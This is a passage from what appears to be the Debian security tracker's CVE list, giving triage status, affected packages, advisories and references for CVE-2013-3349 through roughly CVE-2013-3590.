(Unrestricted file upload vulnerability in admin/uploadImage.html in Se ...) NOT-FOR-US: SearchBlox CVE-2013-3589 (Cross-site scripting (XSS) vulnerability in the login page in the Admi ...) NOT-FOR-US: Dell iDRAC6 CVE-2013-3588 (The web management interface on Zyxel P660 devices allows remote attac ...) NOT-FOR-US: Zyxel CVE-2013-3587 (The HTTPS protocol, as used in unspecified web applications, can encry ...) NOTE: not something we can concretely fix somewhere NOTE: mitigations must be done in webapps NOTE: http://web.archive.org/web/20160304210825/http://breachattack.com/ NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=995168 NOTE: https://www.djangoproject.com/weblog/2013/aug/06/breach-and-django/ NOTE: https://www.mail-archive.com/dev@httpd.apache.org/msg57592.html CVE-2013-3586 (Samsung Web Viewer for Samsung DVR devices allows remote attackers to ...) NOT-FOR-US: Samsung DVR devices CVE-2013-3585 (Samsung Web Viewer for Samsung DVR devices stores credentials in clear ...) NOT-FOR-US: Samsung DVR devices CVE-2013-3584 (Cross-site scripting (XSS) vulnerability in Corporater EPM Suite allow ...) NOT-FOR-US: Corporater EPM Suite CVE-2013-3583 (Cross-site request forgery (CSRF) vulnerability in saveProperties.html ...) NOT-FOR-US: Corporater EPM Suite CVE-2013-3582 (Buffer overflow in Dell BIOS on Dell Latitude D###, E####, XT2, and Z6 ...) NOT-FOR-US: Dell CVE-2013-3581 (ajax.cgi in the web interface on the Choice Wireless Green Packet WIXF ...) NOT-FOR-US: Choice Wireless Green Packet WIXFMR-111 4G WiMax modem CVE-2013-3580 (The TrustGo Antivirus & Mobile Security application before 1.3.6 f ...) NOT-FOR-US: TrustGo CVE-2013-3579 (The Lookout Mobile Security application before 8.17-8a39d3f for Androi ...) NOT-FOR-US: Lookout Mobile Security application for Android CVE-2013-3578 (SQL injection vulnerability in the Help Desk application in Wave EMBAS ...) NOT-FOR-US: ERAS CVE-2013-3577 (SQL injection vulnerability in the Help Desk application in Wave EMBAS ...) NOT-FOR-US: ERAS CVE-2013-3576 (ginkgosnmp.inc in HP System Management Homepage (SMH) allows remote au ...) NOT-FOR-US: HP System Management Homepage CVE-2013-3575 (hpdiags/frontend2/help/pageview.php in HP Insight Diagnostics 9.4.0.47 ...) NOT-FOR-US: HP Insight Diagnostics CVE-2013-3574 (Absolute path traversal vulnerability in hpdiags/frontend2/commands/sa ...) NOT-FOR-US: HP Insight Diagnostics CVE-2013-3573 (HP Insight Diagnostics 9.4.0.4710 allows remote attackers to conduct u ...) NOT-FOR-US: HP Insight Diagnostics CVE-2013-3572 (Cross-site scripting (XSS) vulnerability in the administer interface i ...) NOT-FOR-US: Ubiquiti Networks UniFi CVE-2013-3571 (socat 1.2.0.0 before 1.7.2.2 and 2.0.0-b1 before 2.0.0-b6, when used f ...) - socat 1.7.1.3-1.5 (low; bug #709931) [squeeze] - socat (Minor issue) [wheezy] - socat (Minor issue) NOTE: http://www.dest-unreach.org/socat/contrib/socat-secadv4.html CVE-2013-3570 RESERVED CVE-2013-3569 RESERVED CVE-2013-3568 (Cross-site request forgery (CSRF) vulnerability in Cisco Linksys WRT11 ...) NOT-FOR-US: Cisco CVE-2013-3567 (Puppet 2.7.x before 2.7.22 and 3.2.x before 3.2.2, and Puppet Enterpri ...) {DSA-2715-1} - puppet 3.2.2-1 (bug #712745) CVE-2013-3566 RESERVED CVE-2013-3565 (Multiple cross-site scripting (XSS) vulnerabilities in the HTTP Interf ...) - vlc 2.0.7-1 (unimportant) NOTE: Negligible impact CVE-2013-3564 (The web interface in VideoLAN VLC media player before 2.0.7 has no acc ...) - vlc 2.0.7-1 NOTE: https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18864 CVE-2013-3563 (Stack-based buffer overflow in db_netserver in Lianja SQL Server befor ...) NOT-FOR-US: Lianja SQL Server CVE-2013-3562 (Multiple integer signedness errors in the tvb_unmasked function in epa ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=8499 NOTE: http://www.wireshark.org/security/wnpa-sec-2013-29.html CVE-2013-3561 (Multiple integer overflows in Wireshark 1.8.x before 1.8.7 allow remot ...) - wireshark (This CVE ID is for the Wireshark trunk, the fix 1.8 is CVE-2013-3562) CVE-2013-3560 (The dissect_dsmcc_un_download function in epan/dissectors/packet-mpeg- ...) {DSA-2700-1} - wireshark 1.8.7-1 (unimportant; bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-28.html NOTE: Not suitable for code injection CVE-2013-3559 (epan/dissectors/packet-dcp-etsi.c in the DCP ETSI dissector in Wiresha ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-27.html CVE-2013-3558 (The dissect_ccp_bsdcomp_opt function in epan/dissectors/packet-ppp.c i ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-26.html CVE-2013-3557 (The dissect_ber_choice function in epan/dissectors/packet-ber.c in the ...) {DSA-2700-1} - wireshark 1.8.7-1 (unimportant; bug #709167) [squeeze] - wireshark 1.2.11-6+squeeze11 NOTE: Not suitable for code injection CVE-2013-3556 (The fragment_add_seq_common function in epan/reassemble.c in the ASN.1 ...) - wireshark (Only affected the dev trunk) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-25.html (r48943) CVE-2013-3555 (epan/dissectors/packet-gtpv2.c in the GTPv2 dissector in Wireshark 1.8 ...) {DSA-2700-1} - wireshark 1.8.7-1 (bug #709167) [squeeze] - wireshark (Only affects 1.8.x) NOTE: http://www.wireshark.org/security/wnpa-sec-2013-24.html CVE-2013-3554 RESERVED CVE-2013-3553 (Nitro Pro 7.5.0.22 and earlier and Nitro Reader 2.5.0.36 and earlier a ...) NOT-FOR-US: Nitro Pro CVE-2013-3552 (Nitro Pro 7.5.0.29 and earlier and Nitro Reader 2.5.0.45 and earlier a ...) NOT-FOR-US: Nitro Pro CVE-2013-3551 (Kernel/Modules/AgentTicketPhone.pm in Open Ticket Request System (OTRS ...) {DSA-2696-1} - otrs2 3.2.7-1 [squeeze] - otrs2 CVE-2013-3550 REJECTED CVE-2013-3549 RESERVED CVE-2013-3548 RESERVED CVE-2013-3547 RESERVED CVE-2013-3546 RESERVED CVE-2013-3545 RESERVED CVE-2013-3544 REJECTED CVE-2013-3543 (The AXIS Media Control (AMC) ActiveX control (AxisMediaControlEmb.dll) ...) NOT-FOR-US: AXIS Media Control CVE-2013-3542 (Grandstream GXV3501, GXV3504, GXV3601, GXV3601HD/LL, GXV3611HD/LL, GXV ...) NOT-FOR-US: Grandstream CVE-2013-3541 (Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive ...) NOT-FOR-US: AirLive CVE-2013-3540 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/admin/usrgr ...) NOT-FOR-US: AirLive CVE-2013-3539 (Cross-site request forgery (CSRF) vulnerability in the command/user.cg ...) NOT-FOR-US: Sony CVE-2013-3538 (Multiple cross-site scripting (XSS) vulnerabilities in todooforum.php ...) NOT-FOR-US: Todoo Forum CVE-2013-3537 (Multiple SQL injection vulnerabilities in todooforum.php in Todoo Foru ...) NOT-FOR-US: Todoo Forum CVE-2013-3536 (SQL injection vulnerability in the gp_LoadUserFromHash function in fun ...) NOT-FOR-US: grouppay plugin CVE-2013-3535 (Multiple cross-site scripting (XSS) vulnerabilities in CMSLogik 1.2.0 ...) NOT-FOR-US: CMSLogik CVE-2013-3534 (Cross-site scripting (XSS) vulnerability in the aiContactSafe componen ...) NOT-FOR-US: aiContactSafe CVE-2013-3533 (Multiple SQL injection vulnerabilities in Virtual Access Monitor 3.10. ...) NOT-FOR-US: Virtual Access Monitor CVE-2013-3532 (SQL injection vulnerability in settings.php in the Web Dorado Spider V ...) NOT-FOR-US: WordPress plugin CVE-2013-3531 (SQL injection vulnerability in meneger.php in RadioCMS 2.2 allows remo ...) NOT-FOR-US: RadioCMS CVE-2013-3530 (SQL injection vulnerability in playlist.php in the Spiffy XSPF Player ...) NOT-FOR-US: WordPress plugin CVE-2013-3529 (Multiple cross-site scripting (XSS) vulnerabilities in user/obits.php ...) NOT-FOR-US: WordPress plugin CVE-2013-3528 (Unspecified vulnerability in the update check in Vanilla Forums before ...) NOT-FOR-US: Vanilla Forums CVE-2013-3527 (Multiple SQL injection vulnerabilities in Vanilla Forums before 2.0.18 ...) NOT-FOR-US: Vanilla Forums CVE-2013-3526 (Cross-site scripting (XSS) vulnerability in js/ta_loaded.js.php in the ...) NOT-FOR-US: WordPress plugin CVE-2013-3525 NOTE: http://web.archive.org/web/20151225141212/http://blog.bestpractical.com/2013/04/on-our-security-policies.html CVE-2013-3524 (SQL injection vulnerability in popupnewsitem/ in the Pop Up News modul ...) NOT-FOR-US: phpVMS CVE-2013-3523 (SQL injection vulnerability in This HTML Is Simple (THIS) before 1.2.4 ...) NOT-FOR-US: This HTML Is Simple CVE-2013-3522 (SQL injection vulnerability in index.php/ajax/api/reputation/vote in v ...) NOT-FOR-US: vBulletin CVE-2013-3521 REJECTED CVE-2013-3520 (VMware vCenter Chargeback Manager (aka CBM) before 2.5.1 does not prop ...) NOT-FOR-US: VMware vCenter Chargeback Manager CVE-2013-3519 (lgtosync.sys in VMware Workstation 9.x before 9.0.3, VMware Player 5.x ...) NOT-FOR-US: VMware CVE-2013-3518 RESERVED CVE-2013-3517 (Cross-site scripting (XSS) vulnerability in NETGEAR WNR3500U and WNR35 ...) NOT-FOR-US: NETGEAR CVE-2013-3516 (NETGEAR WNR3500U and WNR3500L routers uses form tokens abased solely o ...) NOT-FOR-US: NETGEAR CVE-2013-3515 (Multiple cross-site scripting (XSS) vulnerabilities in OpenX Source 2. ...) NOT-FOR-US: OpenX CVE-2013-3514 (Multiple directory traversal vulnerabilities in OpenX before 2.8.10 re ...) NOT-FOR-US: OpenX CVE-2013-3513 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Noma ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3512 (The Cacti component in GroundWork Monitor Enterprise 6.7.0 does not pr ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3511 (Open redirect vulnerability in the NeDi component in GroundWork Monito ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3510 (Multiple SQL injection vulnerabilities in GroundWork Monitor Enterpris ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3509 (html/System-NeDi.php in the NeDi component in GroundWork Monitor Enter ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3508 (html/System-Files.php in the System File Overview feature in the NeDi ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3507 (The NeDi component in GroundWork Monitor Enterprise 6.7.0 allows remot ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3506 (cgi-bin/performance/perfchart.cgi in the Performance component in Grou ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3505 (The Nagios-App component in GroundWork Monitor Enterprise 6.7.0 allows ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3504 (Directory traversal vulnerability in monarch.cgi in the MONARCH compon ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3503 (The Profile Importer feature in monarch.cgi in the MONARCH component i ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3502 (monarch_scan.cgi in the MONARCH component in GroundWork Monitor Enterp ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3501 (Multiple cross-site scripting (XSS) vulnerabilities in GroundWork Moni ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3500 (The Foundation webapp admin interface in GroundWork Monitor Enterprise ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3499 (GroundWork Monitor Enterprise 6.7.0 performs authentication on the bas ...) NOT-FOR-US: GroundWork Monitor Enterprise CVE-2013-3498 (Cross-site scripting (XSS) vulnerability in Juniper SmartPass WLAN Sec ...) NOT-FOR-US: Juniper CVE-2013-3497 (Juniper Junos Space before 12.3P2.8, as used on the JA1500 appliance a ...) NOT-FOR-US: Juniper CVE-2013-3496 (Infotecs ViPNet Client 3.2.10 (15632) and earlier, ViPNet Coordinator ...) NOT-FOR-US: Infotecs ViPNet Client CVE-2013-3495 (The Intel VT-d Interrupt Remapping engine in Xen 3.3.x through 4.3.x a ...) - xen 4.4.1-3 (unimportant) NOTE: Hardware design flaw, no software solution CVE-2013-3494 (A Code Execution Vulnerability exists in UMPlayer 0.98 in wintab32.dll ...) NOT-FOR-US: UMPlayer CVE-2013-3493 (XnView 2.03 has an integer overflow vulnerability ...) NOT-FOR-US: XnView CVE-2013-3492 (XnView 2.03 has a stack-based buffer overflow vulnerability ...) NOT-FOR-US: XnView CVE-2013-3491 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Shar ...) NOT-FOR-US: WordPress plugin sharebar CVE-2013-3490 RESERVED CVE-2013-3489 (Buffer overflow in Media Player Classic - Home Cinema (MPC-HC) before ...) NOT-FOR-US: Media Player Classic - Home Cinema (MPC-HC) CVE-2013-3488 (Stack-based buffer overflow in Media Player Classic - Home Cinema (MPC ...) NOT-FOR-US: Media Player Classic - Home Cinema (MPC-HC) CVE-2013-3487 (Multiple cross-site scripting (XSS) vulnerabilities in the security lo ...) NOT-FOR-US: BulletProof Security plugin for WordPress CVE-2013-3486 (IrfanView FlashPix Plugin 4.3.4 0 has an Integer Overflow Vulnerabilit ...) NOT-FOR-US: IrfanView FlashPix Plugin CVE-2013-3485 (Multiple untrusted search path vulnerabilities in Soda PDF 5.1.183.105 ...) NOT-FOR-US: Soda PDF CVE-2013-3484 (Multiple cross-site scripting (XSS) vulnerabilities in dotCMS before 2 ...) NOT-FOR-US: dotCMS CVE-2013-3483 (Stack-based buffer overflow in ermapper_u.dll in Intergraph ERDAS ER V ...) NOT-FOR-US: ERADAS ER Viewer CVE-2013-3482 (Stack-based buffer overflow in the rf_report_error function in ermappe ...) NOT-FOR-US: ERADAS ER Viewer CVE-2013-3481 (Stack-based buffer overflow in Artweaver Plus and Free before 3.1.5 al ...) NOT-FOR-US: Artweaver CVE-2013-3480 (Integer overflow in Sagelight 4.4 and earlier allows remote attackers ...) NOT-FOR-US: Sagelight CVE-2013-3479 (Cross-site request forgery (CSRF) vulnerability in the ShareThis plugi ...) NOT-FOR-US: WordPress plugin ShareThis CVE-2013-3478 (SQL injection vulnerability in Apptha WordPress Video Gallery 2.0, 1.6 ...) NOT-FOR-US: Apptha WordPress Video Gallery CVE-2013-3477 (Cross-site request forgery (CSRF) vulnerability in the Related Posts b ...) NOT-FOR-US: WordPress plugin related-posts-by-zemanta CVE-2013-3476 (Cross-site request forgery (CSRF) vulnerability in the WordPress Relat ...) NOT-FOR-US: WordPress plugin wordpress-23-related-posts-plugin CVE-2013-3475 (Stack-based buffer overflow in db2aud in the Audit Facility in IBM DB2 ...) NOT-FOR-US: IBM CVE-2013-3474 (The Web Administrator Interface on Cisco Wireless LAN Controller (WLC) ...) NOT-FOR-US: Cisco CVE-2013-3473 (The web framework in Cisco Prime Central for Hosted Collaboration Solu ...) NOT-FOR-US: Cisco CVE-2013-3472 (Cross-site request forgery (CSRF) vulnerability in the Enterprise Lice ...) NOT-FOR-US: Cisco CVE-2013-3471 (The captive portal application in Cisco Identity Services Engine (ISE) ...) NOT-FOR-US: Cisco CVE-2013-3470 (The RIP process in Cisco IOS XR allows remote attackers to cause a den ...) NOT-FOR-US: Cisco IOS XR CVE-2013-3469 (Cisco Mobility Services Engine does not properly set up the Oracle SSL ...) NOT-FOR-US: Cisco CVE-2013-3468 (The Cisco Unified IP Phone 8945 with software 9.3(2) allows remote att ...) NOT-FOR-US: Cisco CVE-2013-3467 (Memory leak in the CLI component on Cisco Unified Computing System (UC ...) NOT-FOR-US: Cisco CVE-2013-3466 (The EAP-FAST authentication module in Cisco Secure Access Control Serv ...) NOT-FOR-US: Cisco CVE-2013-3465 RESERVED CVE-2013-3464 (Cisco IOS XR allows local users to cause a denial of service (Silicon ...) NOT-FOR-US: Cisco IOS XR CVE-2013-3463 (The protocol-inspection feature on Cisco Adaptive Security Appliances ...) NOT-FOR-US: Cisco CVE-2013-3462 (Buffer overflow in Cisco Unified Communications Manager (Unified CM) 7 ...) NOT-FOR-US: Cisco CVE-2013-3461 (Cisco Unified Communications Manager (Unified CM) 8.5(x) and 8.6(x) be ...) NOT-FOR-US: Cisco CVE-2013-3460 (Memory leak in Cisco Unified Communications Manager (Unified CM) 8.5(x ...) NOT-FOR-US: Cisco CVE-2013-3459 (Cisco Unified Communications Manager (Unified CM) 7.1(x) before 7.1(5b ...) NOT-FOR-US: Cisco CVE-2013-3458 (Cisco Adaptive Security Appliances (ASA) devices, when SMP is used, do ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2013-3457 (Absolute path traversal vulnerability in the web interface in Cisco Fi ...) NOT-FOR-US: Cisco Finesse CVE-2013-3456 RESERVED CVE-2013-3455 (Cisco Finesse allows remote attackers to obtain sensitive information ...) NOT-FOR-US: Cisco CVE-2013-3454 (Cisco TelePresence System Software 1.10.1 and earlier on 500, 13X0, 1X ...) NOT-FOR-US: Cisco CVE-2013-3453 (Memory leak in Cisco Unified Communications Manager IM and Presence Se ...) NOT-FOR-US: Cisco CVE-2013-3452 RESERVED CVE-2013-3451 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco Un ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-3450 (Cross-site request forgery (CSRF) vulnerability in the User WebDialer ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-3449 RESERVED CVE-2013-3448 (Cisco WebEx Meetings Server does not check whether a user account is a ...) NOT-FOR-US: Cisco CVE-2013-3447 RESERVED CVE-2013-3446 (Open redirect vulnerability in the login page in Cisco Digital Media M ...) NOT-FOR-US: Cisco CVE-2013-3445 (The firewall subsystem in Cisco Identity Services Engine has an incorr ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-3444 (The web framework in Cisco WAAS Software before 4.x and 5.x before 5.0 ...) NOT-FOR-US: Cisco CVE-2013-3443 (The web service framework in Cisco WAAS Software 4.x and 5.x before 5. ...) NOT-FOR-US: Cisco CVE-2013-3442 (The web portal in Cisco Unified Communications Manager (Unified CM) al ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-3441 (Cisco Aironet 3600 access points allow remote attackers to cause a den ...) NOT-FOR-US: Cisco CVE-2013-3440 (Multiple cross-site scripting (XSS) vulnerabilities in the administrat ...) NOT-FOR-US: Cisco CVE-2013-3439 (Cross-site scripting (XSS) vulnerability in Cisco Unified Operations M ...) NOT-FOR-US: Cisco CVE-2013-3438 (The web framework in the server in Cisco Unified MeetingPlace Web Conf ...) NOT-FOR-US: Cisco CVE-2013-3437 (SQL injection vulnerability in the management application in Cisco Uni ...) NOT-FOR-US: Cisco CVE-2013-3436 (The default configuration of the Group Encrypted Transport VPN (GET VP ...) NOT-FOR-US: Cisco IOS CVE-2013-3435 (The Cisco Unified IP Conference Station 7937G allows remote attackers ...) NOT-FOR-US: Cisco CVE-2013-3434 (Untrusted search path vulnerability in Cisco Unified Communications Ma ...) NOT-FOR-US: Cisco CVE-2013-3433 (Untrusted search path vulnerability in Cisco Unified Communications Ma ...) NOT-FOR-US: Cisco CVE-2013-3432 RESERVED CVE-2013-3431 (Cisco Video Surveillance Manager (VSM) before 7.0.0 does not require a ...) NOT-FOR-US: Cisco CVE-2013-3430 (Cisco Video Surveillance Manager (VSM) before 7.0.0 allows remote atta ...) NOT-FOR-US: Cisco CVE-2013-3429 (Multiple directory traversal vulnerabilities in Cisco Video Surveillan ...) NOT-FOR-US: Cisco CVE-2013-3428 (The web interface in Cisco Secure Access Control System (ACS) does not ...) NOT-FOR-US: Cisco CVE-2013-3427 RESERVED CVE-2013-3426 (The Serviceability servlet on Cisco 9900 IP phones does not properly r ...) NOT-FOR-US: Cisco CVE-2013-3425 (The Meeting Center component in Cisco WebEx 11 generates different err ...) NOT-FOR-US: Cisco WebEx 11 CVE-2013-3424 (Cross-site request forgery (CSRF) vulnerability in Administration and ...) NOT-FOR-US: Cisco CVE-2013-3423 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...) NOT-FOR-US: Cisco CVE-2013-3422 (Cross-site scripting (XSS) vulnerability in Administration pages in Ci ...) NOT-FOR-US: Cisco CVE-2013-3421 (Cross-site scripting (XSS) vulnerability in the Help index page in Cis ...) NOT-FOR-US: Cisco CVE-2013-3420 (Cross-site request forgery (CSRF) vulnerability in the web framework o ...) NOT-FOR-US: Cisco Identity Services Engine CVE-2013-3419 (Cross-site scripting (XSS) vulnerability in Cisco Unified MeetingPlace ...) NOT-FOR-US: Cisco CVE-2013-3418 (Cisco Unified Communications Domain Manager does not properly allocate ...) NOT-FOR-US: Cisco CVE-2013-3417 (The administrative web interface in Cisco Video Surveillance Operation ...) NOT-FOR-US: Cisco CVE-2013-3416 (Cross-site scripting (XSS) vulnerability in the web framework in the u ...) NOT-FOR-US: Cisco CVE-2013-3415 (Cisco Adaptive Security Appliance (ASA) Software 8.4.x before 8.4(3) a ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-3414 (Cross-site scripting (XSS) vulnerability in the WebVPN portal login pa ...) NOT-FOR-US: Cisco CVE-2013-3413 (Cross-site scripting (XSS) vulnerability in the search form in the adm ...) NOT-FOR-US: Cisco CVE-2013-3412 (SQL injection vulnerability in Cisco Unified Communications Manager (C ...) NOT-FOR-US: Cisco CVE-2013-3411 (The IDSM-2 drivers in Cisco Intrusion Prevention System (IPS) Software ...) NOT-FOR-US: Cisco CVE-2013-3410 (Cisco Intrusion Prevention System (IPS) Software on IPS NME devices be ...) NOT-FOR-US: Cisco CVE-2013-3409 (The portal in Cisco Prime Central for Hosted Collaboration Solution (H ...) NOT-FOR-US: Cisco CVE-2013-3408 (The firmware on Cisco Virtualization Experience Client 6000 devices se ...) NOT-FOR-US: Cisco CVE-2013-3407 (The web interface in Cisco Server Provisioner 6.4.0 Patch 5-1301292331 ...) NOT-FOR-US: Cisco CVE-2013-3406 (The "Files Available for Download" implementation in the Cisco Intelli ...) NOT-FOR-US: Cisco CVE-2013-3405 (The web portal in TC software on Cisco TelePresence endpoints does not ...) NOT-FOR-US: Cisco CVE-2013-3404 (SQL injection vulnerability in Cisco Unified Communications Manager (C ...) NOT-FOR-US: Cisco CVE-2013-3403 (Multiple untrusted search path vulnerabilities in Cisco Unified Commun ...) NOT-FOR-US: Cisco CVE-2013-3402 (An unspecified function in Cisco Unified Communications Manager (CUCM) ...) NOT-FOR-US: Cisco CVE-2013-3401 (The SIP implementation in Cisco TelePresence TC Software allows remote ...) NOT-FOR-US: Cisco CVE-2013-3400 (The license-installation module in Cisco NX-OS on Nexus 1000V devices ...) NOT-FOR-US: Cisco CVE-2013-3399 (Buffer overflow in an unspecified Android API on the Cisco Desktop Col ...) NOT-FOR-US: Cisco CVE-2013-3398 (The web framework in Cisco Prime Central for Hosted Collaboration Solu ...) NOT-FOR-US: Cisco CVE-2013-3397 (Cross-site request forgery (CSRF) vulnerability in the Unified Service ...) NOT-FOR-US: Cisco CVE-2013-3396 (Cross-site scripting (XSS) vulnerability in the web framework in Cisco ...) NOT-FOR-US: Cisco CVE-2013-3395 (Cross-site request forgery (CSRF) vulnerability in the web framework o ...) NOT-FOR-US: Cisco IronPort Web Security Appliance CVE-2013-3394 (Cross-site scripting (XSS) vulnerability in the web interface in Cisco ...) NOT-FOR-US: Cisco CVE-2013-3393 (The Precision Video Engine component in Cisco Jabber for Windows and C ...) NOT-FOR-US: Cisco CVE-2013-3392 (Multiple cross-site request forgery (CSRF) vulnerabilities in Cisco We ...) NOT-FOR-US: Cisco WebEx Social CVE-2013-3391 RESERVED CVE-2013-3390 (Memory leak in Cisco Prime Central for Hosted Collaboration Solution ( ...) NOT-FOR-US: Cisco Prime Central CVE-2013-3389 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...) NOT-FOR-US: Cisco Prime Central CVE-2013-3388 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...) NOT-FOR-US: Cisco Prime Central CVE-2013-3387 (Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance ...) NOT-FOR-US: Cisco Prime Central CVE-2013-3386 (The IronPort Spam Quarantine (ISQ) component in the web framework in I ...) NOT-FOR-US: Cisco CVE-2013-3385 (The management GUI in the web framework in IronPort AsyncOS on Cisco W ...) NOT-FOR-US: Cisco CVE-2013-3384 (The web framework in IronPort AsyncOS on Cisco Web Security Appliance ...) NOT-FOR-US: Cisco CVE-2013-3383 (The web framework in IronPort AsyncOS on Cisco Web Security Appliance ...) NOT-FOR-US: Cisco CVE-2013-3382 (The Next-Generation Firewall (aka NGFW, formerly CX Context-Aware Secu ...) NOT-FOR-US: Cisco ASA CVE-2013-3381 (Cisco Hosted Collaboration Mediation allows remote attackers to cause ...) NOT-FOR-US: Cisco Hosted Collaboration Mediation CVE-2013-3380 (The administrative web interface in the Access Control Server in Cisco ...) NOT-FOR-US: Cisco Secure Access Control System CVE-2013-3379 (The firewall subsystem in Cisco TelePresence TC Software before 4.2 do ...) NOT-FOR-US: Cisco TelePresence TC Software CVE-2013-3378 (Cisco TelePresence TC Software before 6.1 and TE Software before 4.1.3 ...) NOT-FOR-US: Cisco TelePresence TC Software CVE-2013-3377 (Cisco TelePresence TC Software before 5.1.7 and TE Software before 4.1 ...) NOT-FOR-US: Cisco TelePresence TC Software CVE-2013-3376 (Open redirect vulnerability in the help page in Cisco Video Surveillan ...) NOT-FOR-US: Cisco CVE-2013-3375 (Cross-site scripting (XSS) vulnerability in the portal page in Cisco P ...) NOT-FOR-US: Cisco CVE-2013-3374 (Unspecified vulnerability in Request Tracker (RT) 3.8.x before 3.8.17 ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3373 (CRLF injection vulnerability in Request Tracker (RT) 3.8.x before 3.8. ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3372 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 allow ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3371 (Cross-site scripting (XSS) vulnerability in Request Tracker (RT) 3.8.3 ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3370 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 does ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3369 (Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4.0.13 allow ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3368 (bin/rt in Request Tracker (RT) 3.8.x before 3.8.17 and 4.0.x before 4. ...) {DSA-2671-1 DSA-2670-1} - request-tracker3.8 - request-tracker4 4.0.12-2 (bug #709836) CVE-2013-3367 (Undocumented TELNET service in TRENDnet TEW-691GR and TEW-692GR when a ...) NOT-FOR-US: TRENDnet CVE-2013-3366 (Undocumented TELNET service in TRENDnet TEW-812DRU when a web page nam ...) NOT-FOR-US: TRENDnet CVE-2013-3365 (TRENDnet TEW-812DRU router allows remote authenticated users to execut ...) NOT-FOR-US: TRENDnet TEW-812DRU router CVE-2013-3364 RESERVED CVE-2013-3363 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3362 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3361 (Adobe Flash Player before 11.7.700.242 and 11.8.x before 11.8.800.168 ...) NOT-FOR-US: Adobe Flash Player CVE-2013-3360 (Adobe Shockwave Player before 12.0.4.144 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-3359 (Adobe Shockwave Player before 12.0.4.144 allows attackers to execute a ...) NOT-FOR-US: Adobe Shockwave Player CVE-2013-3358 (Integer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x be ...) NOT-FOR-US: Adobe Reader CVE-2013-3357 (Integer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x be ...) NOT-FOR-US: Adobe Reader CVE-2013-3356 (Buffer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-3355 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...) NOT-FOR-US: Adobe Reader CVE-2013-3354 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...) NOT-FOR-US: Adobe Reader CVE-2013-3353 (Buffer overflow in Adobe Reader and Acrobat before 10.1.8 and 11.x bef ...) NOT-FOR-US: Adobe Reader CVE-2013-3352 (Adobe Reader and Acrobat before 10.1.8 and 11.x before 11.0.04 on Wind ...) NOT-FOR-US: Adobe Reader CVE-2013-3351 (Multiple stack-based buffer overflows in Adobe Reader and Acrobat befo ...) NOT-FOR-US: Adobe Reader CVE-2013-3350 (Adobe ColdFusion 10 before Update 11 allows remote attackers to call C ...) NOT-FOR-US: Adobe ColdFusion CVE-2013-3349 (Unspecified vulnerability in Adobe ColdFusion 9.0 through 9.0.2, when ...) 